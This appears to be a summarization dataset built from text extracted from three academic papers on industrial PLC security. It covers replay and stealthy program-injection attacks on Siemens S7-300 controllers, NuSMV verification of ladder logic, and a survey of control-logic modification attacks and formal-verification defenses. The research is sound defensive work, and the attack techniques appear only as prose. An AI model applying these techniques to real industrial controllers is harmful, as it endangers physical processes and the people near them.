devices from SIMATIC family. The MPI protocol is also used as a programming protocol, and allows the TIA Portal to upload/download the control logic to/from the PLCs. This protocol is so far not supported by any network sniffer and still provides a more secure communication between the control center and the remote devices. This helps to prevent attackers from snooping which in turn improves security as listening and capturing packets transferred over the network is the main base for attackers to perform most of the attacks against ICSs. The exploits in this paper are ef cient but not at all complicated as S7-300 PLCs still use the old version of S7 protocol which lacks of security mechanisms compared to the newer version (S7communication Plus) that the modern S7 PLCs e.g. S7-1200/1500 PLCs use. So in our future work we will investigate if our stealthy attack can be run successfully against the modern S7 PLCs. We are aware of the fact that this will be more challenging as S7comm plus supports improved security implementing anti-replay mechanisms and integrity checks.
Summary:
Industrial control systems (ICSs) consist of pro- grammable logic controllers (PLCs) which communicate with an engineering station on one side, and control a certain physical process on the other side. Siemens PLCs, particularly S7-300 controllers, are widely used in industrial systems, and modern critical infrastructures heavily rely on them. But unfortunately, security features are largely absent in such devices or ig- nored/disabled because security is often at odds with operations. As a consequence of the already reported vulnerabilities, it is possible to leverage PLCs and perhaps even the corporate IT network. In this paper we show that S7-300 PLCs are vulnerable and demonstrate that exploiting the execution process of the logic program running in a PLC is feasible. We discuss a replay attack that compromises the password protected PLCs, then we show how to retrieve the Bytecode from the target and decompile the Bytecode to STL source code. Afterwards we present how to conduct a typical injection attack showing that even a very tiny modi cation in the code is suf cient to harm the target system. Finally we combine the replay attack with the injection approach to achieve a stronger attack the stealth program injection attack which can hide the previous modi cation by engaging a fake PLC, impersonating the real infected device. For real scenarios, we implemented all our attacks on a real industrial setting using S7-300 PLC. We eventually suggest mitigation approaches to secure systems against such threats.
|
Summarize:
I. I NTRODUCTION Processors are becoming more and more important in the world. Today processors can be seen almost everywhere and in the future they will only become more abundant. There are also many types of computers such microcontrollers, distributed control systems (DCSs), and regular personal computers. However, most factories use programmable logic controllers (PLCs) for system control. While these are not very fast, they are very reliable, being able to run 24 hours a day, seven days a week, for many years. This is important because a single crash in the program could cause irreversible damage to the system, factory, or materials. Most PLCs are programmed using ladder logic because of its intuitive and simple environment. PLCs were rst seen in the early 1970s performing simple control tasks. They were physically separated from the rest of the world and in order to install a new program, an engineer would have needed to physically go to the PLC and install the new program. One unintended bene t of this method was that attacking a PLC was infeasible as an attacker also would need to have physical access to the system. However, as industrial systems have become more connected through networks and the Internet, security has not kept pace, allowing easier access to engineers and attackers alike. One well known attack was Stuxnet which was made to disable Iranian centrifuges. [1] One method of detecting and preventing problems in PLC programs is to install additional software on the PLC which would check all running programs. However, this is expensive and dif cult in systems which require very precise timing 978-1-5386-1539-3/17/$31.00 2017 IEEEwith which additional software could interfere. In addition, it would impose large computational burden on the PLC. Another method explored in [2], [3], and [4] is to use formal veri cation to detect malicious or faulty PLC programs. This paper extends this method by identifying certain security vulnerabilities in ladder logic programs. The formal veri cation for this paper was done in NuSMV [6], [7]. NuSMV allows for modeling a nite state machine (FSM) and checking computational tree logic (CTL) spec- i cations and linear temporal logic (LTL) speci cation on the model. If a speci cation is not true in all possible paths through the FSM, NuSMV shows a counterexample of one of those paths. This paper uses CTL speci cations instead of LTL speci cations because CTL can be more speci c than LTL. II. P ROGRAM DESIGN In order to show that a PLC ladder logic program can be modeled in NuSMV, a simple program was designed to be implemented in ladder logic and NuSMV. This program controls a virtual crane arm. The arm continuously moves in an upside-down U-shape from the bottom rear position, where it grabs an object, to the bottom front position where it releases the object as seen in Fig. 1. In addition to this movement, a few inputs were added for controlling the program. The arm stops after it picks up or drops off the object and waits for the operator to select the next action. There is also a pause button that stops all actions until the program is continued. This program was roughly based on the program discussed in [2]. In table I, the sirepresent the possible states of the arm, theairepresent the actions, and the iirepresent the internal control variables. The logic for controlling the arm can be seen in (1)-(13). s0= ((( s1a0) +s0)a1) +i4 (1) s1= (( s0a1) +s1)a0i4 (2) s2= (( s3a2) +s2)a3i4 (3) s3= ((( s2a3) +s3)a2) +i4 (4) s4= ((( s5a4) +s4)a5) +i4 (5) s5= (( s4a5) +s5)a4i4 (6) a0=s2i1s0i2i4 (7) a1=s2i0s1i2i4 (8) Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:26 UTC from IEEE Xplore. Restrictions apply. TABLE I ARM CONTROL VARIABLES Name Variable Name Variable front s0 downward a3 rear s1 opening a4 top s2 closing a5 bottom s3 topick i0 open s4 toplace i1 closed s5 paused i2 forward a0 ready i3 backward a1 start i4 upward a2 Fig. 1. Arm Operation a2= (( s0i0) + ( s1i1))s2i2i4 (9) a3= (( s1i0) + ( s0i1))s3i2i4 (10) a4=s3s0i1s4i2i4 (11) a5=s3s1i0s5i2i4 (12) i3= (s5i0) + ( s4i1) + ( i3i0i1) +i4 (13) Because there are only certain tracks that the arm can move along, only one action should be true at once otherwise damage would be caused to the arm. Also if the opening action is true while the bottom state is false, that means that the arm is dropping the object, which could cause damage to the object. III. L ADDER LOGIC IMPLEMENTATION The implementation of this program in ladder logic can be seen in Fig. 2. For the sake of presentation, the rungs in this gure are not necessarily in the same place as they are in the actual program. These are the rungs that are changed for the intrusions in section VI. In this program, the actions are represented with TON blocks. These timers running represent the actuator motors running on the arm. The timers all run for 2000 milliseconds. Also, any state variable, si, that uses an action variable, ai, does not become true until the timeris done timing. For example, front becomes true only after forward is done timing. IV. N USMV IMPLEMENTATION For the purpose of comparison with Fig. 2, the correspond- ing NuSMV can be seen in Fig. 3. The line numbers are just for reference and are not necessarily the same as in the actual program. This model implements the same logic equations as the ladder logic. The only thing that is different from the ladder logic is the way that the operator inputs are modeled. Instead of being nondeterministic, the inputs are only selected when they make sense to be selected. For example the start input is selected only at the very beginning when the arm is not in any state. This change was made because the model checker should assume that the operator will select the correct inputs and check for problems caused by malicious code only and not user incompetence. In addition, the pause button is never selected because otherwise the model checker can falsely determine that the program is frozen when in reality it is just paused. This can be done because the pause button would only be used in extreme situations. Also because it is only a change to one rung, it can easily be tested separately. V. CTL SPECIFICATIONS The CTL speci cations that were used to test this model can be seen in Fig. 4. The line numbers are just for reference and are not necessarily the same as in the actual program. These are the variables that change for one of the intrusions looked at in section VI. The speci cation starting on line 1 checks to make sure that the crane arm can always continue moving through every position. If this speci cation is false, there is at least one position that is unreachable by the arm. The speci cation starting on line 4 checks that the arm can always move in at least one direction. If this speci cation is false, the arm is stuck in the same position forever. The speci cation starting on line 6 checks that at most one motor is running at once. If this is not the case then either the arm is moving in more than one direction at once, dropping the object when it is not supposed to, or gripping before it is in the correct position to pick up the object. To determine which of these problems is occurring, the counterexample generated by NuSMV should be examined. If one of the actions is opening, then it is dropping the object, if one is closing, then it is not picking up the object, otherwise it is moving in more than one direction at once. The speci cation starting on line 18 checks that any motor which starts running, stops running eventually. If this is not true then it means one motor is running forever, which could casue damage to the arm. The speci cation starting on line 23 checks a state variable, sidoes not change without a timer nishing. If this happened, it would mean that a state variable could change without the position actually changing. VI. F ORMAL VERIFICATION OF THE SELECTED INTRUSIONS In order to test the CTL speci cations, several intrusions were modeled into the NuSMV one at a time. These intrusions Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:26 UTC from IEEE Xplore. Restrictions apply. Fig. 2. Selection from ladder logic implementation of arm program were found to have six malfunctions on the operation of the arm. There are also three types of intrusion that do not cause any of the CTL speci cations to become false. The six malfunctions are the following: 1)The arm freezes with all timers stopped. 2)The arm tries to move in more than one direction at once. 3)The arm drops the object early. 4)The arm grips early. 5)The arm freezes with a timer running. 6)A state variable changes without a timer nishing. In the rst malfunction, the whole program freezes. This can be seen by changing a0toa0in (1). The correct version of thisequation is implemented in rung 0 of Fig. 2 and lines 1-5 of Fig. 3. This type of intrusion causes the rst and second CTL speci cations to be false. In the second malfunction, the arm tries to move in more than one direction at the same time. This can be seen by changing s2tos2in (7). The correct version of this equation is implemented in rung 2 of Fig. 2 and lines 11-15 of Fig. 3. This type of intrusion causes the third CTL speci cation to be false. However, the counterexample generated by NuSMV needs to be examined to differentiate this from effects 3 and 4. In the third malfunction, the arm releases the object early. This can be seen by changing s3tos3 in (11). The correct version of this equation is implemented in rung 3 of Fig. 2 and lines 16-20 of Fig. 3. This type of Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:26 UTC from IEEE Xplore. Restrictions apply. Fig. 3. Selection from NuSMV implementation of arm program Fig. 4. The CTL speci cations used for the arm model Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:26 UTC from IEEE Xplore. Restrictions apply. intrusion causes the third CTL speci cation to be false. In the fourth malfunction, the arm grips early. This can be seen by changing s3tos3in (12). The correct version of this equation is implemented in rung 4 of Fig. 2 and lines 21-25 of Fig. 3. This type of intrusion causes the third CTL speci cation to be false. In the fth malfunction, the arm freezes with a timer running and can be seen by changing the time that any timer runs to a very large value. This type of intrusion causes the fourth CTL speci cation to be false. In the sixth malfunction, a state variable changes without a timer nishing and can be seen by changing the duration of any timer to 0 milliseconds. This type of intrusion caused the fth CTL speci cation to be false. The three types intrusions that do not cause any CTL speci cations to be false are the following: 1)The change has a negligible effect on the operation of the arm. 2)The program continues before the user selects the next action. 3)The program is not able to be paused. The rst effect can be seen by changing s0tos0in (2). The correct version of this equation is implemented in rung 1 of Fig. 2 and lines 6-10 of Fig. 3. While this change does slightly change the program, it does not change the operation of the arm. The second effect can be seen by changing the input for the next action. Because this is not a direct change to the logic, none of the equations are changed. However the change could be seen in rung 5 of Fig. 2 and lines 26-30 of Fig. 3. The third effect can be seen by adding a dummy variable in rung 6 of Fig. 2 and line 33 of Fig. 3 such that i2is always false. This does not cause any CTL speci cation to be false because it was assumed that the program would never be paused anyway. This type of effect should be checked for manually because of the mentioned assumption. VII. C ONCLUSION The purpose of this paper was to show that a PLC ladder logic program could be modeled and veri ed in NuSMV. Also that CTL speci cation could be used to detect faulty ladder logic programs before they cause damage to the system. To do this, a simple example program was designed to control a virtual crane arm. The logic for this program was implemented in ladder logic for the PLC and modeled in NuSMV. Several intrusions were introduced to the NuSMV model one at a time and CTL speci cations were used to determine if and how each model was intruded. Six malfunctions were found. ACKNOWLEDGMENT This work is supported by the National Science Foundations REU Site grant (NSF CNS #1560434).
Summary:
Programmable logic controllers (PLCs) are heavy- duty computers used to control industrial systems. For many years these systems were physically separated from any other network making attacks extremely dif cult. However, these in- creasingly connected systems have not improved much in terms of security, leaving them vulnerable to attacks. This paper attempts to show that ladder logic programs for PLCs can be modeled in NuSMV and veri ed using computational tree logic (CTL) speci cations. This paper also shows how simple changes to the ladder logic program can cause catastrophic damage to the PLC system. This intruded code can be dif cult to detect by looking at the ladder logic program because the change is so small. However, the intruded code can be modeled in NuSMV and identi ed by properly written CTL speci cations.
|
Summarize:
Index Terms PLC, attack, formal veri cation 1. Introduction Industrial control systems (ICS) are subject to attacks sabotaging the physical processes, as shown in Stuxnet [33], Havex [46], TRITON [31], Black Energy [8], andthe German Steel Mill [63]. PLCs are the last line incontrolling and defending for these critical ICS systems. However, in our analysis of Common Vulnerabilities and Exposures (CVE)s related to control logic, we haveseen a fast growth of vulnerabilities in recent years [86].These vulnerabilities are distributed across vendors anddomains, and their severeness remains high. A closer lookat these vulnerabilities reveals that the weaknesses behindthem are not novel. As Figure 1shows, multiple weak- nesses are repeating across different industrial domains,such as stack-based buffer over ow and improper inputvalidation. We want to understand how these weaknesseshave been used in different attacks, and how existingsolutions defend against the attacks. Among various attacks, control logic modi cation at- tacks cause the most critical damages. Such attacks lever-age the aws in the PLC program to produce undesiredstates. As a principled approach detecting aws in pro-grams, formal veri cation has long been used to defend Figure 1: The reported common weaknesses and the af-fected industrial sectors. The notation denotes the numberof CVEs. control logic modi cation attacks [24], [26]. It bene ts from several advantages that other security solutions failto provide. First, PLCs have to strictly meet the real-time constraints in controlling the physical processes. Thismakes it impractical for heavyweight solutions to performa large amount of dynamic analysis. Second, the physicalprocesses are often safety-critical, meaning false posi-tives are intolerable. Formal veri cation is lightweight,accurate, and suitable for graphical languages, which arecommonly used to develop PLC programs. Over the years, there have been extensive studies investigating control logic modi cation attacks, and for-mal veri cation-based defenses. To understand the currentresearch progress in these areas, and to identify openproblems for future research directions, we performed asystematization of current studies. Scope of the paper. We considered studies presenting control logic modi cation attacks through modifying pro-gram payload (i.e. program code), or feeding special inputdata to trigger program design aws. We also consideredstudies presenting formal veri cation techniques to protectthe affected programs, including behavior modeling, statereduction, speci cation generation, and veri cation. For-mal veri cation of network protocols is out of the scopeof the paper. We selected the literature based on three cri-teria: (1) the study investigates control logic modi cationattacks or formal veri cation-based defenses, (2) the studyis impactful considering its number of citations, or (3) thestudy discovers a new direction for future research. Systematization methodology. Our systematization was based on the following aspects. We use attack todenote control logic modi cation, and defense to denoteformal veri cation-based defense. Threat model: this refers to the requirements and 3852021 IEEE European Symposium on Security and Privacy (EuroS&P) 2021, Ruimin Sun. Under license to IEEE. DOI 10.1109/EuroSP51992.2021.000342021 IEEE European Symposium on Security and Privacy (EuroS&P) | 978-1-6654-1491-3/21/$31.00 2021 IEEE | DOI: 10.1109/EUROSP51992.2021.00034 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:36:17 UTC from IEEE Xplore. Restrictions apply. assumptions to perform the attacks/defenses. Security goal: this refers to the security properties affected by attacks/defenses. Weakness: this refers to the aw triggered to performthe attacks. Detection to evade: this refers to the detection thatfails to capture the attacks. Challenge: this refers to the challenges in defendingthe attacks the advance of attacks, and the insuf -ciency of defenses. Defense focus: this refers to the speci c researchtopic in formal veri cation, e.g. behavior modeling,state reduction, speci cation generation, and formalveri cation. We found that control logic modi cation attacks could happen under every threat model and considered variousevasive techniques. The attacks have been fast evolvingwith the system design, through input channels from thesensors, the engineering stations, and other connectedPLCs. The attacks could also evade dynamic state es-timations and veri cation techniques through leveragingimplicitly speci ed properties. Multiple attacks [54], [64],[83] even deceived engineering stations with fake behav-iors. We also found that applying formal veri cation has made great progress in improving code quality [97].However, the majority of the studies investigated ad-hoc formal veri cation research targeting PLC programs.These studies face challenges in many aspects of formalveri cation, during program modeling, state reduction,speci cation generation, and veri cation. We found manystudies manually de ne domain-speci c safety properties,and verify them based on a few simple test cases. Despitethe limitation of test cases, the implicitness of propertieswas not well explored, even though such properties havebeen used to conduct input manipulation attacks [68] [70]. Besides implicit properties, speci cation generationhas seen challenges in catching up with program model-ing, to support semantics and rules from new attack sur-faces. In addition, the real-time constraint limited runtimeveri cation in supporting temporal features, event-drivenfeatures, and multitasks. The dependency on proprietaryand vendor-speci c techniques resulted in ad-hoc studies.The lack of open source tools impeded thorough evalu-ation across models, frameworks, and real programs inindustry complexity. As a call for solutions to address these challenges, we highlight the need of defending security issues besidessafety issues, and we provide a set of recommendations forfuture research directions. We recommend future researchto pay attention to plant modeling and to defend againstinput manipulation attacks. We recommend the collabora-tion between state reduction and stealthy attack detection.We highlight the need for automatic generation of domain-speci c and incremental speci cations. We also encouragemore exploration in real-time veri cation, together withmore support in open-source tools, and thorough perfor-mance and security evaluation. Our study makes the following contributions: Systematization of control logic modi cation attacksand formal veri cation-based defenses in the lastthirty years. Figure 2: The architecture of a PLC. Identifying the challenges in defending control logicmodi cation attacks, and barriers existed in currentformal veri cation research. Pointing out future research directions. The rest of the paper is organized as follows. Section 2brie y describes the background knowledge of PLCs and formal veri cation. Section 3describes the motivation of this work and the methodology of the systematization.Section 4and Section 5systematize existing studies on control logic modi cation attacks, and formal veri cation-based defenses categorized on threat models and the ap-proaches to perform the attack/defense. Section 6provides recommendations for future research directions to counterexisting challenges. Section 7concludes the paper. 2. Background 2.1. PLC Program 2.1.1. Programming languages. IEC-61131 [87] de ned ve types of languages for PLC source code: Ladder diagram (LD), Structured text (ST), Function block diagram (FBD), Sequential function chart (SFC), Instruction list (IL). Among them, LD, FBD, and SFC are graph-based languages. IL was deprecated in 2013. PLC programsare developed in engineering stations, which provide standard-compliant or vendor-speci c Integrated Devel-opment Environments (IDEs) and compilers. Some high-end PLCs also support computer-compatible languages(e.g., C, BASIC, and assembly), special high-level lan- guages (e.g., Siemens GRAPH5 [2]), and boolean logic languages [67]. 2.1.2. Program bytecode/binary. An engineering sta- tion may compile source code to bytecode or binary depending on the type of a PLC. For example, SiemensS7 compiles source code to proprietary MC7 bytecodeand uses PLC runtime to interpret the bytecode, whileCODESYS compiles source code to binaries (i.e. nativemachine code) [55]. Unlike conventional software thatfollows well-documented formats, such as Executable andLinkable Format (ELF) for Linux and Portable Executable(PE) for Windows, the format of PLC binaries is oftenproprietary and unknown. Therefore, further explorationrequires reverse engineering. 2.1.3. Scan cycle. Unlike conventional software, a PLC program executes by in nitely repeating a scan cycle that 386 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:36:17 UTC from IEEE Xplore. Restrictions apply. consists of three steps (as Figure 2shows). First, the input scan reads the inputs from the connected sensors and saves them to a data table. Then, the logic execution feeds the input data to the program and executes the logic. Finally, the output scan produces the output to the physical processes based on the execution result. The scan cycle must comply with strict prede ned timing constraints to enforce the real-time execution. TheI/O operations are the critical part in meeting the cycletime. 2.1.4. Hardware support. PLCs adopt a hierarchical memory, with prede ned addressing scheme associated with physical hardware locations. PLC vendors maychoose different schemes for I/O addressing, memoryorganization, and instruction sets, making it hard for thesame code to be compatible across vendors, or evenmodels within the same vendor. 2.2. PLC program security PLCs interact with a broad set of components, as Figure 3shows. They are connected to sensors and ac- tuators to interact with and control the physical world.They are connected to supervisory human interfaces (e.g.the engineering station) to update the program and receiveoperator commands. They may also be interconnected in asubnet. These interactions expose PLCs to various attacks.For example, communication between the engineeringstation and the PLC may be insecure, the sensors might becompromised, and the PLC rmware can be vulnerable. 2.2.1. Control logic modi cation. Our study considers control logic modi cation attacks, which we de ne as attacks that can change the behavior of PLC control logic.Control logic modi cation attacks can be achieved throughprogram payload/code modi cation and/or program input manipulation. The payload modi cation can be applied toprogram source code, bytecode or binary (Section 2.1). The input manipulation can craft input data to exploitexisted design aws in the program to produce undesiredstates. The input may come from any interacting compo-nents showed in Figure 3. Defending against these attacks is challenging. As we mentioned earlier, PLCs have to strictly maintain the scancycle time to control the physical world in real-time.This requirement overweights security solutions requir-ing a large amount of dynamic analysis. Moreover, thesecurity solution has to be accurate, since the controlledphysical processes are critical in the industry, making falsepositives less tolerable. 2.2.2. Formal veri cation. Formal veri cation is a lightweight and accurate defense solution, which is often tailored for graphical languages. This makes it suitable todefend against control logic modi cation attacks. Formal veri cation is a method that proves or dis- proves if a program/algorithm meets its speci cations ordesired properties based on a certain form of logic [32].The speci cation may contain security requirements andsafety requirements. Commonly used mathematical mod-els to do formal veri cation include nite state machines,labeled transition systems, vector addition systems, Petrinets, timed automata, hybrid automata, process algebra,and formal semantics of programming languages, e.g.operational semantics, denotational semantics, axiomaticsemantics, and Hoare logic. In general, there are twotypes of formal analysis: model checking and theoremproving [45]. Model checking uses temporal logic todescribe speci cations, and ef cient search methods tocheck whether the speci cations hold for a given system.Theorem proving describes the system with a series oflogical formulae. It proves the formulae implying theproperty via deduction with inference rules provided bythe logical system. It usually requires more backgroundknowledge and nontrivial manual efforts. We will describethe commonly used frameworks and tools for formalveri cation in later sections. An extended background in Appendix Aprovides an example of an ST program controlling the traf c lights ina road intersection, an example of an input manipulationattack, and the process of using formal veri cation todetect and prevent it. 3. Motivation and Methodology In this section, we rst explain our focus on control logic modi cation attacks and formal veri cation-basedprotection. Then, we use an example to introduce oursystematization methodology. 3.1. Motivation We focus on control logic modi cation due to its criti- cal impact on the PLC industry. Control logic modi cationcovers attacks from program payload (i.e. program code)modi cation to data input manipulation. These attacksresult from frequently reported vulnerabilities, and alsocause unsafe behaviors to the critical industrial infrastruc-ture, as Figure 1shows. To mitigate control logic modi cation attacks, exten- sive studies have been performed using formal methodson PLC programs. Formal methods have demonstrateduniqueness and practicality to the PLC industry. For ex-ample, Beckhoff TwinCat 3 and Nuclear DevelopmentEnvironment 2.0 have integrated safety veri cation dur-ing PLC program implementation [56]. Formal methodshave also been used in the PLC programs controllingOntario Power Generation, and Darlington Nuclear PowerGenerating Station [76]. Nevertheless, we found existingresearch to be ad-hoc, and the area is still new to thesecurity community. We believe our systematization canbene t the community with recommendations for futureresearch directions. Besides formal methods, there are additional defense techniques. At the design level, one can use encryptednetwork communication, private sensor inputs, and isolatedifferent functionalities of the engineering station. Theseprotections are orthogonal to formal methods and commonfor any type of software/architecture. In addition, onecan leverage intrusion detection techniques with dynamicanalysis. Such analysis often involves complex algorithms,such as machine learning or neural networks, which re-quire extensive runtime memory, and may introduce falsepositives. However, PLCs have limited memory and are 387 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:36:17 UTC from IEEE Xplore. Restrictions apply. Figure 3: A PLC controlling traf c light signals. less tolerant to false positives, given the controlled physi- cal processes can be safety-critical. Thus, intrusion detec-tion for PLC programs are less practical than for regularsoftware. To improve PLC security, formal methods cancooperate with these techniques. 3.2. Methodology 3.2.1. Motivating Example. Figure 3shows a motivating example with a PLC controlling traf c light signals at anintersection. In step 1/circlecopyrt, a PLC program developer pro- grams the control logic code in one of the ve languagesdescribed in Section 2.1.1, in an engineering station (e.g. located in the transportation department). The engineeringstation compiles the code into bytecode or binary basedon the type of the PLC. Then in step 2/circlecopyrt, the compiled bytecode/binary will be transmitted to the PLC located at aroad intersection through network communication. In step 3/circlecopyrt, the bytecode/binary will run in the PLC, by using the input from sensors (e.g. whether a pedestrian presses thebutton to cross the intersection), and producing output tocontrol the physical processes (i.e. turning on/off a greenlight). The duration of lights will depend on whether apedestrian presses the button to cross. Within each step, vulnerabilities can exist which al- low attackers to affect the behavior of the control logic.The following describes the threat model assumptions forattackers to perform control logic modi cation attacks. 3.2.2. Threat Model Assumptions. T1: In this threat model, attackers assume accesses to the program source code, developed in one of the languages described inSection 2.1.1. Attackers generate attacks by directly mod- ifying the source code. Such attacks happen in the en-gineering station as step 1/circlecopyrtin Figure 3. Attackers can be internal staffs who have accesses to the engineeringstation, or can leverage vulnerabilities of the engineeringstation [1], [50], [51] to access it. T2: In this threat model, attackers have no access to program source code but can access program bytecode or binary. Attackers generate attacks by rst reverse en-gineering the program bytecode/binary, then modifyingthe decompiled code, and nally recompiling it. Suchattacks happen during the bytecode/binary transmissionfrom the engineering station to the PLC ( 2/circlecopyrtin Figure 3). Attackers can intercept and modify the transmissionleveraging vulnerabilities in the network communication[48], [49], [52]. T3: In this threat model, attackers have no access to program source code nor bytecode/binary. Instead, attack-ers can guess/speculate the logic of the control programby accessing the program runtime environment, including the PLC rmware, hardware, or/and Input and Outputtraces. Attackers can modify the real-time sensor input tothe program ( 3/circlecopyrtin Figure 3). Such attacks are practical since within the same domain, the general settings of theinfrastructure layout are similar, and infrastructures (e.g.traf c lights) can be publicly accessible [3], [43], [69]. 3.2.3. Weaknesses. Attackers usually leverage existing program weaknesses for control logic modi cation. The following enumerates the weaknesses.W1: Multiple assignments for output variables. Race con-dition can happen when an output variable depends onmultiple timers or counters. Since one timer may runfaster or slower than the other, at a certain moment, theoutput variable will produce a non-deterministic value. Inthe traf c light example, this may cause the green lightto be on and off in a short time, or two lights to be onsimultaneously.W2: Uninitialized or unused variables. An uninitializedvariable will be given the default value in a PLC program.If an input variable is uninitialized, attackers can provideillegal values for it during runtime. Similarly, attackerscan leverage unused output variables to send private in-formation.W3: Hidden jumpers. Such jumpers will usually bypass aportion of the program, and are only triggered on a certain(attacker-controlled) condition. The attackers can embedmalware in the bypassed portion of the program.W4: Improper runtime input. Attackers can craft illegalinput values based on the types of the input variables tocause unsafe behavior. For example, attackers can providean input index that is out-of-the-bound of an array.W5: Prede ned memory layout of the PLC hardware. PLCaddressing usually follows the format [6] of a storageclass (e.g. Ifor input, Qfor output), a data size (e.g. XforBOOL ,WforWORD ), and a hierarchical address indicating the location of the physical port. Attackerscan leverage the format to speculate the variables duringruntime.W6: Real-time constraints. The scan cycle has to strictlyfollow a maximum cycle time to enforce the real-timeexecution. In non-preemptive multitask programs, one taskhas to wait for the completion of another task beforestarting the next scan cycle. To generate synchronizationattacks, attackers can create loops or introduce a largenumber of I/O operations to extend the execution time. Among the weaknesses, attackers need accurate pro- gram information to exploit W1, W2, and W3. Therefore, these attacks usually happen in T1. To disguise the mod- i cation to the source code, attackers in T1can include these weaknesses as bad coding practice, without affectingthe major control logic. The other weaknesses are usuallyexploited in T2and T3. 3.2.4. Security Goals. The security goals of existing studies are related to the security properties of CIA:con dentiality, integrity, and availability.GC: Con dentiality. The attacks violate con dentiality by stealthily monitoring the execution of PLC programsleveraging existing weaknesses (e.g. W2, W3). Formalveri cation approaches defend accordingly.GI: Integrity. The attacks violate integrity by causing PLC programs to produce states that are unsafe for thephysical process (e.g. plant), for example, over owing a 388 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:36:17 UTC from IEEE Xplore. Restrictions apply. water tank, or uctuating power generation [11], [58], [85]. Formal veri cation approaches defend by verify-ing (i) generic properties that are process-independent, and (ii) domain-speci c properties that consider the plant model. Due to the amount of studies targeting GI, wefurther split GI into generic payload modi cation (GI 1) without program I/O nor plant settings, generic input ma-nipulation (GI 2) with program I/O, domain-speci c pay- load modi cation (GI 3) with plant settings, and domain- speci c input manipulation ( GI 4) with program I/O and plant settings. GA: Availability.: The attacks violate availability by ex- hausting PLC resources (memory or processing power)and causing a denial-of-service. Formal veri cation ap-proaches defend accordingly. 4. Systematization of Attacks This section systematizes PLC attack methodologies under the categorization of threat models. Within eachcategory, we discuss the goals of the attacks and theunderlying weaknesses. We also summarize the challengesof attack mitigation. 4.1. Attack Methodologies Given the exposed threat models, the following section describes the attack methodologies of existing studiesaccording to the security goals. Table 1summarizes these studies. 4.1.1. T1: program source code. At the source code level, the code injection or modi cation has to be stealthy, in a way that no observable changes would be introducedto the major functionality of the program, or masked asnovice programmer mistakes. In other words, the attackscould be disguised as unintentional bad coding practices. Existing studies [84], [88] mainly discussed attacks on graphical languages, e.g. LD, because small changes onsuch programs could not be easily noticed. Serhane et.al [84] focused on the weak points on LD programs that could be exploited by malicious attacks.Targeting G1to cause unsafe behaviors, attackers could generate uncertainly uctuating output variables, for ex-ample, intentionally introducing two timers to control thesame output variable, could lead to a race condition. Thiscould damage devices, similar to Stuxnet [33], but unpre-dictably. Attackers could also bypass certain functions,manually force the values of certain operands, or applyempty branches or jumps. Targeting G2to stay stealthy while spying the pro- gram, attackers could use array instructions or user-de ned instructions, to log critical parameters and values.Targeting G3to generate DoS attacks, attackers could apply an in nite loop via jumps, and use nest timers andjumps to only trigger the attack at a certain time. Thisattack could slow down or crash the PLC in a severematter. Because PLC programmers often leave unused vari- ables and operands, both the spying program and the DoSprogram could leverage unused programming resources. These attacks leveraged weaknesses W1-W4, and fo- cused on single ladder program. To extend the attacks tomulti-ladder programs, Valentine et.al [88] further pre- sented attacks that could install a jump to a subroutinecommand, and modify the interaction between two ormore ladders in a program. This could be disguised asan erroneous use of scope and linkage by a novice pro-grammer. In addition to code injection and modi cation, McLaughlin et.al [69] presented input manipulation at- tacks to cause unsafe behaviors. This study analyzed thecode to obtain the relationship between the input andoutput variables and deducted the desired range for outputvariables. Attackers can craft inputs that could lead toundesired outputs for the program. The crafted inputs haveto evade the state estimation detection of the PLC. Sincethe input manipulation happens in T3, and more studies discussed input manipulation attacks without using sourcecode, we will elaborate on these attacks in T3. 4.1.2. T2: program bytecode/binary. Studies at this threat model mainly investigated program reverse engi-neering, and program modi cation attacks. Instead ofdisguising as bad coding practices, like those in T1, the injection at the program binary aimed at evading behaviordetectors. To design an attack prototype, McLaughlin et.al [70] tested on a train interlocking program. The program wasreverse engineered using a format library. With the decom-piled program, they extracted the eldbus ID that indicatedthe PLC vendor and model, and then obtained cluesabout the process structure and operations. To generateunsafe behaviors, such as causing con ict states for thetrain signals, they targeted timing-sensitive signals andswitches. To evade safety property detection, they adoptedan existed solution [34] to nd the implicit properties ofthe behavior detectors. For example, variable rdepends on pandq, so a property may de ne the relationship between pandq, as a method to protect r. However, attackers can directly change the value of rwithout affecting pandq, and the change will not alarm the detector. In this way,they automatically searched for all the Boolean equations,and could generate malicious payloads based on that. Based on this prototype, SABOT [68] was imple- mented. SABOT required a high-level description of thephysical process, for example, the plant contains twoingredient valves and one drain valve . Such informationcould be acquired from public channels, and are similarfor processes in the same industrial sector. With thisinformation, SABOT generated a behavioral speci cationfor the physical processes and used incremental modelchecking to search for a mapping between a variablewithin the program, and a speci ed physical process.Using this map, SABOT compiled a dynamic payloadcustomized for the physical process. Both studies were limited to Siemens devices, with- out revealing many details on reverse engineering. Toprovide more information, and support CodeSys-basedprograms, Keliris et.al [55] implemented an open-source decompiler, ICSREF, which could automatically reverseengineer CodeSys-based programs, and generate mali-cious payloads. ICSREF targeted PID controller functionsand manipulated the parameters such as the setpoints,proportional/integral/derivative gains, initial values, etc.ICSREF inferred the physical characteristics of the con- 389 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:36:17 UTC from IEEE Xplore. Restrictions apply. TABLE 1: The studies investigating control logic modi cation attacks. Thr eat ModelPaper WeaknessSecurity GoalAttack TypeDetection toEvadeNetw ork AccessPLC Language/T ypeTools Serhane 18 [84] W1,2,3 GI1,GC,GA both Programmer ES LD, RSLogix N/A Valentine 13 [88] W1,2,3,6 GI1,GC passi ve Programmer N/A LD PLC-SF , vul. assessmentT1 sourcecode McLaughlin 11 [70] W4 GI3 both State verif. ES generic N/A ICSREF [55] W4 GI3 passi ve NA ES,PLC Codesys-based angr, ICSREF SABO T[68] W4 GI3 passi ve N/A ES,PLC IL NuSMVT2bytecode/binary McLaughlin 11 [70] W4 GI3 both State verif. ES,PLC generic N/A PLCInject [58] W5 GC both N/A ES,PLC IL,Siemens PLCInject malware PLC-Blaster [85] W5 GC,GA active N/A ES,Sensor, PLC Siemens 